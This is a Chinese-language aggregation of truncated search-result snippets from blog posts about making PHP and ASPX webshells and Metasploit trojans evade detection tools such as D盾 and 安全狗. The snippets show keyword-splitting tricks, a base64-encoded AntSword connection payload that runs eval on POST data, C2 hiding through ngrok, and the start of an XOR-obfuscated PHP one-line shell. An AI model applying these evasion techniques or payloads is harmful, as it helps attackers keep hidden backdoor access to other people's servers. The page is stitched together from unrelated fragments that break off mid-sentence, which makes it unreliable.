原文轉載於：http://www.legendsec.org/1701.html 覺得寫得還算蠻科普的。 00x1.關鍵字拆分。 比如assert，可以寫成 ‘a’.’ss’.’e’.’r’.’t’這樣。 總結：這種方法雖然簡單，但是卻沒有太強的免殺功效，需要 ...

D盾查殺無提示 利用方法如圖，實際就是「任意3個字符的前綴+base64編碼的PHP代碼」 中國蟻劍連接參數 key=aaaZXZhbCgkX1BPU1RbMV0pOw==&1 連接成功 ...

hi，我是涼風，（以下內容純屬個人見解，如有不同的意見歡迎回復指出） ，本菜比發現aspx過狗的姿勢不常見，不像php一樣一抓一大把，於是我決定研究一下aspx 本文作者：i春秋簽約作家——涼風 引用i春秋作家團大佬@非主流 對一句話木馬的理解： 一句話木馬的意思就是，我們制造 ...

本文講述如何免殺msf木馬並成功上線，主要內容包括隱藏c2、過靜態查殺、過行為查殺 0x00. 隱藏c2 為了隱藏c2，我們這里使用了ngrok的內網穿透，獲得了一個ngrok提供的域名（ngrok可在官網下載：https://ngrok.com/）： 執行以下命令，將本地4455 ...

0×00 前言 大部分Webshell查殺工具都是基於關鍵字特征的,通常他們會維護一個關鍵字列表,以此遍歷指定擴展名的文件來進行掃描,所以可能最先想到的是各種字符串變形,下面總結了一些小的方法,各種不足之前還請看官拍磚. 0×01 字符串上的舞蹈 一般標准的一句話 ...

題記 天下古今之庸人，皆以一惰字致敗；天下古今之才人，皆以一傲字致敗。 ------曾國藩 概述 這個木馬我從大佬的博客學來的，沒想到效果這么好，文章鏈接：https://mp.weixin.qq.com/s ...

免殺PHP一句話shell，利用隨機異或免殺D盾，免殺安全狗護衛神等 <?php class VONE { function HALB() { $rlf = 'B' ^ "\x23"; $fzq = 'D' ^ "\x37"; $fgu = 'h' ^ "\x1b ...

0x00 eval和assert的區別 http://www.vuln.cn/8395 http://www.php.net/manual/zh/function.eval.php http ...